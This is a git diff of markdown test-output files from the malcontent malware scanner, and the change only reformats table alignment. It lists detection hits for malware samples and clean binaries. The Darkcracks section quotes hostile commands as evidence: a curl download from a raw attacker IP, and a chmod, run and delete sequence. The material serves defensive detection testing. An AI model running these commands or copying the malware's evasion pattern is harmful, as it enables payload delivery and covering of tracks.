[r>>>24](https://github.com/search?q=r%3E%3E%3E24&type=code)
[a>>>24](https://github.com/search?q=a%3E%3E%3E24&type=code)
[y>>>13](https://github.com/search?q=y%3E%3E%3E13&type=code)
[m>>>13](https://github.com/search?q=m%3E%3E%3E13&type=code)
[f>>>13](https://github.com/search?q=f%3E%3E%3E13&type=code)
[u>>>13](https://github.com/search?q=u%3E%3E%3E13&type=code)
[t>>>26](https://github.com/search?q=t%3E%3E%3E26&type=code)
[v>>>16](https://github.com/search?q=v%3E%3E%3E16&type=code)
[v>>>24](https://github.com/search?q=v%3E%3E%3E24&type=code)
[c>>>24](https://github.com/search?q=c%3E%3E%3E24&type=code)
[c>>>16](https://github.com/search?q=c%3E%3E%3E16&type=code)
[l>>>26](https://github.com/search?q=l%3E%3E%3E26&type=code)
[u>>>16](https://github.com/search?q=u%3E%3E%3E16&type=code)
[h>>>16](https://github.com/search?q=h%3E%3E%3E16&type=code)
[n>>>26](https://github.com/search?q=n%3E%3E%3E26&type=code)
[h>>>24](https://github.com/search?q=h%3E%3E%3E24&type=code)
[d>>>16](https://github.com/search?q=d%3E%3E%3E16&type=code)
[n>>>31](https://github.com/search?q=n%3E%3E%3E31&type=code)
[o>>>31](https://github.com/search?q=o%3E%3E%3E31&type=code)
[f>>>31](https://github.com/search?q=f%3E%3E%3E31&type=code)
[p>>>31](https://github.com/search?q=p%3E%3E%3E31&type=code)
[h>>>31](https://github.com/search?q=h%3E%3E%3E31&type=code)
[d>>>31](https://github.com/search?q=d%3E%3E%3E31&type=code)
[l>>>31](https://github.com/search?q=l%3E%3E%3E31&type=code)
[i>>>16](https://github.com/search?q=i%3E%3E%3E16&type=code)
[n>>>17](https://github.com/search?q=n%3E%3E%3E17&type=code)
[a>>>15](https://github.com/search?q=a%3E%3E%3E15&type=code)
[s>>>31](https://github.com/search?q=s%3E%3E%3E31&type=code)
[a>>>31](https://github.com/search?q=a%3E%3E%3E31&type=code)
[o>>>10](https://github.com/search?q=o%3E%3E%3E10&type=code)
[i>>>31](https://github.com/search?q=i%3E%3E%3E31&type=code)
[w>>>28](https://github.com/search?q=w%3E%3E%3E28&type=code)
[v>>>28](https://github.com/search?q=v%3E%3E%3E28&type=code)
[b>>>29](https://github.com/search?q=b%3E%3E%3E29&type=code)
[y>>>29](https://github.com/search?q=y%3E%3E%3E29&type=code)
[k>>>20](https://github.com/search?q=k%3E%3E%3E20&type=code)
[j>>>21](https://github.com/search?q=j%3E%3E%3E21&type=code)
[z>>>17](https://github.com/search?q=z%3E%3E%3E17&type=code)
[e>>>12](https://github.com/search?q=e%3E%3E%3E12&type=code)
[e>>>25](https://github.com/search?q=e%3E%3E%3E25&type=code)
[e>>>18](https://github.com/search?q=e%3E%3E%3E18&type=code)
[e>>>27](https://github.com/search?q=e%3E%3E%3E27&type=code)
[e>>>31](https://github.com/search?q=e%3E%3E%3E31&type=code)
[e>>>22](https://github.com/search?q=e%3E%3E%3E22&type=code)
[e>>>11](https://github.com/search?q=e%3E%3E%3E11&type=code)
[e>>>17](https://github.com/search?q=e%3E%3E%3E17&type=code)
[e>>>14](https://github.com/search?q=e%3E%3E%3E14&type=code)
[t>>>29](https://github.com/search?q=t%3E%3E%3E29&type=code)
[t>>>16](https://github.com/search?q=t%3E%3E%3E16&type=code)
[r>>>13](https://github.com/search?q=r%3E%3E%3E13&type=code)
[i>>>10](https://github.com/search?q=i%3E%3E%3E10&type=code)
[s>>>14](https://github.com/search?q=s%3E%3E%3E14&type=code)
[n>>>16](https://github.com/search?q=n%3E%3E%3E16&type=code)
[w>>>17](https://github.com/search?q=w%3E%3E%3E17&type=code)
[w>>>19](https://github.com/search?q=w%3E%3E%3E19&type=code)
[w>>>10](https://github.com/search?q=w%3E%3E%3E10&type=code)
[w>>>18](https://github.com/search?q=w%3E%3E%3E18&type=code)
[h>>>11](https://github.com/search?q=h%3E%3E%3E11&type=code)
[h>>>25](https://github.com/search?q=h%3E%3E%3E25&type=code)
[a>>>22](https://github.com/search?q=a%3E%3E%3E22&type=code)
[x>>>14](https://github.com/search?q=x%3E%3E%3E14&type=code)
[x>>>18](https://github.com/search?q=x%3E%3E%3E18&type=code)
[g>>>16](https://github.com/search?q=g%3E%3E%3E16&type=code)
[h>>>29](https://github.com/search?q=h%3E%3E%3E29&type=code)
[h>>>19](https://github.com/search?q=h%3E%3E%3E19&type=code)
[d>>>29](https://github.com/search?q=d%3E%3E%3E29&type=code)
[t>>>32](https://github.com/search?q=t%3E%3E%3E32&type=code)
[x>>>23](https://github.com/search?q=x%3E%3E%3E23&type=code)
[e>>>5](https://github.com/search?q=e%3E%3E%3E5&type=code)
[q>>>0](https://github.com/search?q=q%3E%3E%3E0&type=code)
[e>>>7](https://github.com/search?q=e%3E%3E%3E7&type=code)
[e>>>8](https://github.com/search?q=e%3E%3E%3E8&type=code)
[t>>>9](https://github.com/search?q=t%3E%3E%3E9&type=code)
[t>>>7](https://github.com/search?q=t%3E%3E%3E7&type=code)
[d>>>6](https://github.com/search?q=d%3E%3E%3E6&type=code)
[q>>>3](https://github.com/search?q=q%3E%3E%3E3&type=code)
[e>>>4](https://github.com/search?q=e%3E%3E%3E4&type=code)
[e>>>0](https://github.com/search?q=e%3E%3E%3E0&type=code)
[h>>>6](https://github.com/search?q=h%3E%3E%3E6&type=code)
[a>>>8](https://github.com/search?q=a%3E%3E%3E8&type=code)
[s>>>8](https://github.com/search?q=s%3E%3E%3E8&type=code)
[i>>>5](https://github.com/search?q=i%3E%3E%3E5&type=code)
[u>>>8](https://github.com/search?q=u%3E%3E%3E8&type=code)
[c>>>8](https://github.com/search?q=c%3E%3E%3E8&type=code)
[d>>>8](https://github.com/search?q=d%3E%3E%3E8&type=code)
[h>>>8](https://github.com/search?q=h%3E%3E%3E8&type=code)
[n>>>7](https://github.com/search?q=n%3E%3E%3E7&type=code)
[o>>>4](https://github.com/search?q=o%3E%3E%3E4&type=code)
[l>>>8](https://github.com/search?q=l%3E%3E%3E8&type=code)
[c>>>5](https://github.com/search?q=c%3E%3E%3E5&type=code)
[k>>>4](https://github.com/search?q=k%3E%3E%3E4&type=code)
[v>>>8](https://github.com/search?q=v%3E%3E%3E8&type=code)
[p>>>8](https://github.com/search?q=p%3E%3E%3E8&type=code)
[w>>>3](https://github.com/search?q=w%3E%3E%3E3&type=code)
[r>>>8](https://github.com/search?q=r%3E%3E%3E8&type=code)
[n>>>8](https://github.com/search?q=n%3E%3E%3E8&type=code)
[f>>>8](https://github.com/search?q=f%3E%3E%3E8&type=code)
[a>>>0](https://github.com/search?q=a%3E%3E%3E0&type=code)
[l>>>0](https://github.com/search?q=l%3E%3E%3E0&type=code)
[o>>>5](https://github.com/search?q=o%3E%3E%3E5&type=code)
[o>>>8](https://github.com/search?q=o%3E%3E%3E8&type=code)
[t>>>0](https://github.com/search?q=t%3E%3E%3E0&type=code)
[r>>>0](https://github.com/search?q=r%3E%3E%3E0&type=code)
[i>>>0](https://github.com/search?q=i%3E%3E%3E0&type=code)
[n>>>0](https://github.com/search?q=n%3E%3E%3E0&type=code)
[s>>>0](https://github.com/search?q=s%3E%3E%3E0&type=code)
[o>>>0](https://github.com/search?q=o%3E%3E%3E0&type=code)
[c>>>0](https://github.com/search?q=c%3E%3E%3E0&type=code)
[z>>>0](https://github.com/search?q=z%3E%3E%3E0&type=code)
[b>>>0](https://github.com/search?q=b%3E%3E%3E0&type=code)
[v>>>0](https://github.com/search?q=v%3E%3E%3E0&type=code)
[m>>>0](https://github.com/search?q=m%3E%3E%3E0&type=code)
[p>>>0](https://github.com/search?q=p%3E%3E%3E0&type=code)
[n>>>5](https://github.com/search?q=n%3E%3E%3E5&type=code)
[a>>>6](https://github.com/search?q=a%3E%3E%3E6&type=code)
[p>>>7](https://github.com/search?q=p%3E%3E%3E7&type=code)
[s>>>6](https://github.com/search?q=s%3E%3E%3E6&type=code)
[x>>>9](https://github.com/search?q=x%3E%3E%3E9&type=code)
[h>>>7](https://github.com/search?q=h%3E%3E%3E7&type=code)
[d>>>7](https://github.com/search?q=d%3E%3E%3E7&type=code)
[w>>>7](https://github.com/search?q=w%3E%3E%3E7&type=code) | | +HIGH | **[c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#exotic_tld)** | Contains HTTP hostname with unusual top-level domain | [https://api.mantlescan.xyz/](https://api.mantlescan.xyz/)
[https://mantlescan.xyz/](https://mantlescan.xyz/)
[https://openchain.xyz/](https://openchain.xyz/) | @@ -57,7 +57,7 @@ ### 5 removed behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | -MEDIUM | [anti-static/obfuscation/strtoi](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/strtoi.yara#sketchy_parseint_math) | complex math and string to integer conversion | [alFrames*100](https://github.com/search?q=alFrames%2A100&type=code)
[56320+65536](https://github.com/search?q=56320%2B65536&type=code)
[969v6h-12](https://github.com/search?q=969v6h-12&type=code)
[100*this](https://github.com/search?q=100%2Athis&type=code)
[100*Math](https://github.com/search?q=100%2AMath&type=code)
[parseInt](https://github.com/search?q=parseInt&type=code)
[180*Math](https://github.com/search?q=180%2AMath&type=code)
[01*this](https://github.com/search?q=01%2Athis&type=code)
[i-56320](https://github.com/search?q=i-56320&type=code)
[r-55296](https://github.com/search?q=r-55296&type=code)
[01*Math](https://github.com/search?q=01%2AMath&type=code)
[255*G](https://github.com/search?q=255%2AG&type=code)
[255*e](https://github.com/search?q=255%2Ae&type=code)
[001*t](https://github.com/search?q=001%2At&type=code)
[255*t](https://github.com/search?q=255%2At&type=code)
[001*r](https://github.com/search?q=001%2Ar&type=code)
[255*j](https://github.com/search?q=255%2Aj&type=code)
[001-e](https://github.com/search?q=001-e&type=code)
[001+e](https://github.com/search?q=001%2Be&type=code)
[255*u](https://github.com/search?q=255%2Au&type=code)
[984-3](https://github.com/search?q=984-3&type=code)
[01*a](https://github.com/search?q=01%2Aa&type=code)
[01*n](https://github.com/search?q=01%2An&type=code)
[01+i](https://github.com/search?q=01%2Bi&type=code)
[10*h](https://github.com/search?q=10%2Ah&type=code)
[v-90](https://github.com/search?q=v-90&type=code)
[h+90](https://github.com/search?q=h%2B90&type=code)
[19*e](https://github.com/search?q=19%2Ae&type=code)
[12*e](https://github.com/search?q=12%2Ae&type=code) | | -MEDIUM | [anti-static/obfuscation/utf16](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/utf16.yara#sketchy_fromCharCode_math) | complex math and utf16 code unit conversion | [fromCharCode](https://github.com/search?q=fromCharCode&type=code)
[alFrames*100](https://github.com/search?q=alFrames%2A100&type=code)
[56320+65536](https://github.com/search?q=56320%2B65536&type=code)
[969v6h-12](https://github.com/search?q=969v6h-12&type=code)
[100*this](https://github.com/search?q=100%2Athis&type=code)
[100*Math](https://github.com/search?q=100%2AMath&type=code)
[180*Math](https://github.com/search?q=180%2AMath&type=code)
[01*this](https://github.com/search?q=01%2Athis&type=code)
[r-55296](https://github.com/search?q=r-55296&type=code)
[i-56320](https://github.com/search?q=i-56320&type=code)
[01*Math](https://github.com/search?q=01%2AMath&type=code)
[984-3](https://github.com/search?q=984-3&type=code)
[255*e](https://github.com/search?q=255%2Ae&type=code)
[255*t](https://github.com/search?q=255%2At&type=code)
[255*j](https://github.com/search?q=255%2Aj&type=code)
[001*t](https://github.com/search?q=001%2At&type=code)
[001*r](https://github.com/search?q=001%2Ar&type=code)
[001-e](https://github.com/search?q=001-e&type=code)
[001+e](https://github.com/search?q=001%2Be&type=code)
[255*G](https://github.com/search?q=255%2AG&type=code)
[255*u](https://github.com/search?q=255%2Au&type=code)
[01*n](https://github.com/search?q=01%2An&type=code)
[01*a](https://github.com/search?q=01%2Aa&type=code)
[10*h](https://github.com/search?q=10%2Ah&type=code)
[19*e](https://github.com/search?q=19%2Ae&type=code)
[12*e](https://github.com/search?q=12%2Ae&type=code)
[v-90](https://github.com/search?q=v-90&type=code)
[h+90](https://github.com/search?q=h%2B90&type=code)
[01+i](https://github.com/search?q=01%2Bi&type=code) | | -MEDIUM | [data/encoding/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/url.yara#decode_uri_component) | decodes URL components | [decodeURIComponent](https://github.com/search?q=decodeURIComponent&type=code) | diff --git a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md index e2288f43d..1d4c056fd 100644 --- a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md +++ b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md @@ -1,7 +1,7 @@ ## linux/2022.bpfdoor/2023.ConnectBack/tiny [😈 CRITICAL] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | | | MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | diff --git a/tests/linux/2023.ConnectBack/tiny.md b/tests/linux/2023.ConnectBack/tiny.md index 8ea5e9d9b..3df0a5873 100644 --- a/tests/linux/2023.ConnectBack/tiny.md +++ b/tests/linux/2023.ConnectBack/tiny.md @@ -1,7 +1,7 @@ ## linux/2023.ConnectBack/tiny [😈 CRITICAL] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | | | MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | diff --git a/tests/linux/2024.Darkcracks/darkcracks.sh.md b/tests/linux/2024.Darkcracks/darkcracks.sh.md index 21947b244..2a63cc50f 100644 
--- a/tests/linux/2024.Darkcracks/darkcracks.sh.md +++ b/tests/linux/2024.Darkcracks/darkcracks.sh.md @@ -1,7 +1,7 @@ ## linux/2024.Darkcracks/darkcracks.sh [😈 CRITICAL] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | CRITICAL | [evasion/file/location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /;](https://github.com/search?q=cd+%2F%3B&type=code) | | CRITICAL | [evasion/self_deletion/run_and_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/self_deletion/run_and_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
[sleep 3](https://github.com/search?q=sleep+3&type=code) | | CRITICAL | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_download_ip) | Invokes curl to download a file from an IP | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o&type=code) | diff --git a/tests/linux/UPX/06ed158.md b/tests/linux/UPX/06ed158.md index b993ef244..bf6b79fbe 100644 --- a/tests/linux/UPX/06ed158.md +++ b/tests/linux/UPX/06ed158.md @@ -1,7 +1,7 @@ ## linux/UPX/06ed158 [😈 CRITICAL] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | HIGH | [anti-static/elf/content](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/content.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | | | HIGH | [anti-static/elf/entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/entropy.yara#normal_elf_high_entropy_7_4) | high entropy footer in ELF binary (>7.4) | | | HIGH | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#high_entropy_header) | high entropy ELF header (>7) | | diff --git a/tests/linux/clean/code-oss.md b/tests/linux/clean/code-oss.md index 1aa125ec1..df3aef476 100644 --- a/tests/linux/clean/code-oss.md +++ b/tests/linux/clean/code-oss.md 
@@ -1,7 +1,7 @@ ## linux/clean/code-oss [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | may check if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) | | MEDIUM | [anti-behavior/LD_PROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_PROFILE.yara#env_LD_PROFILE) | may check if dynamic linker profiling is enabled | [LD_PROFILE](https://github.com/search?q=LD_PROFILE&type=code) | | MEDIUM | [anti-behavior/vm_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/vm-check.yara#vm_checker) | Checks to see if it is running with a VM | [GenuineIntel](https://github.com/search?q=GenuineIntel&type=code)
[VMware](https://github.com/search?q=VMware&type=code) | diff --git a/tests/linux/clean/cpack.md b/tests/linux/clean/cpack.md index caf2ce678..9b049d11f 100644 --- a/tests/linux/clean/cpack.md +++ b/tests/linux/clean/cpack.md @@ -1,7 +1,7 @@ ## linux/clean/cpack [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [local_ip](https://github.com/search?q=local_ip&type=code)
[use_port](https://github.com/search?q=use_port&type=code)
[Port](https://github.com/search?q=Port&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [clientID](https://github.com/search?q=clientID&type=code) | diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md index e2d48ee2d..45a376d40 100644 --- a/tests/linux/clean/ls.x86_64.md +++ b/tests/linux/clean/ls.x86_64.md @@ -1,7 +1,7 @@ ## linux/clean/ls.x86_64 [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | | LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html) | | LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[x86](https://github.com/search?q=x86&type=code) | diff --git a/tests/linux/clean/lslogins.md b/tests/linux/clean/lslogins.md index 834b8e910..d829ed5b7 100644 --- a/tests/linux/clean/lslogins.md +++ b/tests/linux/clean/lslogins.md @@ -1,7 +1,7 @@ ## linux/clean/lslogins [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [evasion/logging/current_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/current_logins.yara#current_logins) | accesses current logins | [/var/log/wtmp](https://github.com/search?q=%2Fvar%2Flog%2Fwtmp&type=code) | diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md index 5eeb8aae4..03fcc32b6 100644 --- a/tests/linux/clean/pandoc.md +++ b/tests/linux/clean/pandoc.md @@ -1,7 +1,7 @@ ## linux/clean/pandoc [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [curlopt_port](https://github.com/search?q=curlopt_port&type=code)
[primary_port](https://github.com/search?q=primary_port&type=code)
[internal_ip](https://github.com/search?q=internal_ip&type=code)
[lnormhet_ip](https://github.com/search?q=lnormhet_ip&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[radius_port](https://github.com/search?q=radius_port&type=code)
[domain_port](https://github.com/search?q=domain_port&type=code)
[config_port](https://github.com/search?q=config_port&type=code)
[client_port](https://github.com/search?q=client_port&type=code)
[server_port](https://github.com/search?q=server_port&type=code)
[validate_ip](https://github.com/search?q=validate_ip&type=code)
[lloghet_ip](https://github.com/search?q=lloghet_ip&type=code)
[serverPort](https://github.com/search?q=serverPort&type=code)
[socketPort](https://github.com/search?q=socketPort&type=code)
[weibhet_ip](https://github.com/search?q=weibhet_ip&type=code)
[ipproto_ip](https://github.com/search?q=ipproto_ip&type=code)
[ereghet_ip](https://github.com/search?q=ereghet_ip&type=code)
[gomphet_ip](https://github.com/search?q=gomphet_ip&type=code)
[primary_ip](https://github.com/search?q=primary_ip&type=code)
[local_port](https://github.com/search?q=local_port&type=code)
[framed_ip](https://github.com/search?q=framed_ip&type=code)
[gamhet_ip](https://github.com/search?q=gamhet_ip&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[proxyPort](https://github.com/search?q=proxyPort&type=code)
[login_ip](https://github.com/search?q=login_ip&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[nas_port](https://github.com/search?q=nas_port&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[sam_port](https://github.com/search?q=sam_port&type=code)
[lat_port](https://github.com/search?q=lat_port&type=code)
[url_port](https://github.com/search?q=url_port&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[bindPort](https://github.com/search?q=bindPort&type=code)
[ftp_port](https://github.com/search?q=ftp_port&type=code)
[uriPort](https://github.com/search?q=uriPort&type=code)
[host_ip](https://github.com/search?q=host_ip&type=code)
[setPort](https://github.com/search?q=setPort&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[pg_port](https://github.com/search?q=pg_port&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[nas_ip](https://github.com/search?q=nas_ip&type=code)
[blIp](https://github.com/search?q=blIp&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[xIp](https://github.com/search?q=xIp&type=code)
[eIp](https://github.com/search?q=eIp&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [inet_server_addr](https://github.com/search?q=inet_server_addr&type=code) | diff --git a/tests/linux/clean/ping.x86_64.md b/tests/linux/clean/ping.x86_64.md index ec993fe70..01b056128 100644 --- a/tests/linux/clean/ping.x86_64.md +++ b/tests/linux/clean/ping.x86_64.md @@ -1,7 +1,7 @@ ## linux/clean/ping.x86_64 [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [Port](https://github.com/search?q=Port&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [discover/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/multiple.yara#sys_net_recon) | collects system and network information | [ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code)
[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)
[id](https://github.com/search?q=id&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code) | diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md index a7669e6db..6fe1fcebf 100644 --- a/tests/linux/clean/qemu-system-xtensa.md +++ b/tests/linux/clean/qemu-system-xtensa.md @@ -1,7 +1,7 @@ ## linux/clean/qemu-system-xtensa [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [throttle_port](https://github.com/search?q=throttle_port&type=code)
[upstream_port](https://github.com/search?q=upstream_port&type=code)
[register_port](https://github.com/search?q=register_port&type=code)
[virtser_port](https://github.com/search?q=virtser_port&type=code)
[megasas_port](https://github.com/search?q=megasas_port&type=code)
[release_port](https://github.com/search?q=release_port&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[handle_port](https://github.com/search?q=handle_port&type=code)
[mptsas_port](https://github.com/search?q=mptsas_port&type=code)
[remove_port](https://github.com/search?q=remove_port&type=code)
[metadata_ip](https://github.com/search?q=metadata_ip&type=code)
[claim_port](https://github.com/search?q=claim_port&type=code)
[reset_port](https://github.com/search?q=reset_port&type=code)
[clear_port](https://github.com/search?q=clear_port&type=code)
[write_port](https://github.com/search?q=write_port&type=code)
[compare_ip](https://github.com/search?q=compare_ip&type=code)
[state_port](https://github.com/search?q=state_port&type=code)
[extract_ip](https://github.com/search?q=extract_ip&type=code)
[ohci_port](https://github.com/search?q=ohci_port&type=code)
[xhci_port](https://github.com/search?q=xhci_port&type=code)
[pcie_port](https://github.com/search?q=pcie_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[ahci_port](https://github.com/search?q=ahci_port&type=code)
[find_port](https://github.com/search?q=find_port&type=code)
[mmio_port](https://github.com/search?q=mmio_port&type=code)
[ehci_port](https://github.com/search?q=ehci_port&type=code)
[spdm_port](https://github.com/search?q=spdm_port&type=code)
[update_ip](https://github.com/search?q=update_ip&type=code)
[uhci_port](https://github.com/search?q=uhci_port&type=code)
[usb_port](https://github.com/search?q=usb_port&type=code)
[fix_port](https://github.com/search?q=fix_port&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[mem_port](https://github.com/search?q=mem_port&type=code)
[hub_port](https://github.com/search?q=hub_port&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[and_port](https://github.com/search?q=and_port&type=code)
[be_port](https://github.com/search?q=be_port&type=code)
[get_ip](https://github.com/search?q=get_ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[IP](https://github.com/search?q=IP&type=code)
